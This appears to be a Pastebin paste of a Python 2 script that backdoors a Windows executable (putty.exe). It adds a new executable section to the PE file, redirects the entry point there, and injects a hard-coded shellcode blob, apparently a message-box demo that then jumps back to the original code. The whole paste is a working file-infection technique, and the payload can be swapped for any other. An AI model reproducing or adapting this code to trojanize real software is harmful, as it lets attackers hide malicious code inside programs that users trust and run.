daily pastebin goal
40%
SHARE
TWEET

Untitled

a guest Jun 19th, 2017 47 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import pefile
  2. import mmap
  3. import os
  4.  
  5.  
  6. def align(val_to_align, alignment):
  7.     return ((val_to_align + alignment - 1) / alignment) * alignment
  8.  
  9. exe_path = "C:\Users\jbt\Desktop\putty.exe"
  10. shellcode = bytes(b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"
  11.                   b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
  12.                   b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
  13.                   b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
  14.                   b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
  15.                   b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
  16.                   b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
  17.                   b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
  18.                   b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
  19.                   b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
  20.                   b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e"
  21.                   b"\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
  22.                   b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
  23.                   b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
  24.                   b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
  25.                   b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x69\x74\x79\x58\x68"
  26.                   b"\x65\x63\x75\x72\x68\x6b\x49\x6e\x53\x68\x42\x72\x65"
  27.                   b"\x61\x31\xdb\x88\x5c\x24\x0f\x89\xe3\x68\x65\x58\x20"
  28.                   b"\x20\x68\x20\x63\x6f\x64\x68\x6e\x20\x75\x72\x68\x27"
  29.                   b"\x6d\x20\x69\x68\x6f\x2c\x20\x49\x68\x48\x65\x6c\x6c"
  30.                   b"\x31\xc9\x88\x4c\x24\x15\x89\xe1\x31\xd2\x6a\x40\x53"
  31.                   b"\x51\x52\xff\xd0\xB8\xF0\x50\x45\x00\xFF\xD0")
  32.  
  33. # STEP 0x01 - Resize the Executable
  34. # Note: I added some more space to avoid error
  35. print "[*] STEP 0x01 - Resize the Executable"
  36.  
  37. original_size = os.path.getsize(exe_path)
  38. print "\t[+] Original Size = %d" % original_size
  39. fd = open(exe_path, 'a+b')
  40. map = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_WRITE)
  41. map.resize(original_size + 0x2000)
  42. map.close()
  43. fd.close()
  44.  
  45. print "\t[+] New Size = %d bytes\n" % os.path.getsize(exe_path)
  46.  
  47. # STEP 0x02 - Add the New Section Header
  48. print "[*] STEP 0x02 - Add the New Section Header"
  49.  
  50. pe = pefile.PE(exe_path)
  51. number_of_section = pe.FILE_HEADER.NumberOfSections
  52. last_section = number_of_section - 1
  53. file_alignment = pe.OPTIONAL_HEADER.FileAlignment
  54. section_alignment = pe.OPTIONAL_HEADER.SectionAlignment
  55. new_section_offset = (pe.sections[number_of_section - 1].get_file_offset() + 40)
  56.  
  57. # Look for valid values for the new section header
  58. raw_size = align(0x1000, file_alignment)
  59. virtual_size = align(0x1000, section_alignment)
  60. raw_offset = align((pe.sections[last_section].PointerToRawData +
  61.                     pe.sections[last_section].SizeOfRawData),
  62.                    file_alignment)
  63.  
  64. virtual_offset = align((pe.sections[last_section].VirtualAddress +
  65.                         pe.sections[last_section].Misc_VirtualSize),
  66.                        section_alignment)
  67.  
  68. # CODE | EXECUTE | READ | WRITE
  69. characteristics = 0xE0000020
  70. # Section name must be equal to 8 bytes
  71. name = ".axc" + (4 * '\x00')
  72.  
  73. # Create the section
  74. # Set the name
  75. pe.set_bytes_at_offset(new_section_offset, name)
  76. print "\t[+] Section Name = %s" % name
  77. # Set the virtual size
  78. pe.set_dword_at_offset(new_section_offset + 8, virtual_size)
  79. print "\t[+] Virtual Size = %s" % hex(virtual_size)
  80. # Set the virtual offset
  81. pe.set_dword_at_offset(new_section_offset + 12, virtual_offset)
  82. print "\t[+] Virtual Offset = %s" % hex(virtual_offset)
  83. # Set the raw size
  84. pe.set_dword_at_offset(new_section_offset + 16, raw_size)
  85. print "\t[+] Raw Size = %s" % hex(raw_size)
  86. # Set the raw offset
  87. pe.set_dword_at_offset(new_section_offset + 20, raw_offset)
  88. print "\t[+] Raw Offset = %s" % hex(raw_offset)
  89. # Set the following fields to zero
  90. pe.set_bytes_at_offset(new_section_offset + 24, (12 * '\x00'))
  91. # Set the characteristics
  92. pe.set_dword_at_offset(new_section_offset + 36, characteristics)
  93. print "\t[+] Characteristics = %s\n" % hex(characteristics)
  94.  
  95. # STEP 0x03 - Modify the Main Headers
  96. print "[*] STEP 0x03 - Modify the Main Headers"
  97. pe.FILE_HEADER.NumberOfSections += 1
  98. print "\t[+] Number of Sections = %s" % pe.FILE_HEADER.NumberOfSections
  99. pe.OPTIONAL_HEADER.SizeOfImage = virtual_size + virtual_offset
  100. print "\t[+] Size of Image = %d bytes" % pe.OPTIONAL_HEADER.SizeOfImage
  101.  
  102. pe.write(exe_path)
  103.  
  104. pe = pefile.PE(exe_path)
  105. number_of_section = pe.FILE_HEADER.NumberOfSections
  106. last_section = number_of_section - 1
  107. new_ep = pe.sections[last_section].VirtualAddress
  108. print "\t[+] New Entry Point = %s" % hex(pe.sections[last_section].VirtualAddress)
  109. oep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
  110. print "\t[+] Original Entry Point = %s\n" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
  111. pe.OPTIONAL_HEADER.AddressOfEntryPoint = new_ep
  112.  
  113. # STEP 0x04 - Inject the Shellcode in the New Section
  114. print "[*] STEP 0x04 - Inject the Shellcode in the New Section"
  115.  
  116. raw_offset = pe.sections[last_section].PointerToRawData
  117. pe.set_bytes_at_offset(raw_offset, shellcode)
  118. print "\t[+] Shellcode wrote in the new section"
  119.  
  120. pe.write(exe_path)
RAW Paste Data
Top